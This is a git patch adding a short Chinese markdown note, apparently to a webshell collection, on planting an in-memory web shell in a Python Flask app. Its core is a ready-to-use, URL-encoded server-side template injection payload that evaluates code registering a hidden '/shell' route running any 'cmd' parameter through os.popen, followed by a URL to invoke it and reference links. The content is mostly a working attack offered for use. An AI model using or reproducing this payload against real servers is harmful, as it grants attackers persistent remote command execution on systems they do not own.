From 8b5b371da44903fa31643d7b567fc6c2d9d58fef Mon Sep 17 00:00:00 2001
From: tennc <670357+tennc@users.noreply.github.com>
Date: Fri, 4 Jun 2021 19:54:16 +0800
Subject: [PATCH] =?UTF-8?q?add=20python=20flask=20=E5=86=85=E5=AD=98?=
 =?UTF-8?q?=E9=A9=AC=20@jweny?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

from : https://github.com/jweny/MemShellDemo/blob/master/MemShellForPython/python%20flask%20%E5%86%85%E5%AD%98%E9%A9%AC.md
---
 py/python flask 内存马.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 py/python flask 内存马.md

diff --git a/py/python flask 内存马.md b/py/python flask 内存马.md
new file mode 100644
index 0000000..9a067d2
--- /dev/null
+++ b/py/python flask 内存马.md	
@@ -0,0 +1,18 @@
+先起一个带有ssti的flask：
+
+插入路由：
+
+http://127.0.0.1:8000/test?param={{url_for.__globals__[%27__builtins__%27][%27eval%27](%22app.add_url_rule(%27/shell%27,%20%27shell%27,%20lambda%20:__import__(%27os%27).popen(_request_ctx_stack.top.request.args.get(%27cmd%27,%20%27whoami%27)).read())%22,{%27_request_ctx_stack%27:url_for.__globals__[%27_request_ctx_stack%27],%27app%27:url_for.__globals__[%27current_app%27]})}}
+
+
+访问植入的shell：
+http://127.0.0.1:8000/shell?cmd=whoami
+
+
+参考：
+
+https://github.com/iceyhexman/flask_memory_shell
+
+https://segmentfault.com/a/1190000022175553
+
+https://xz.aliyun.com/t/8029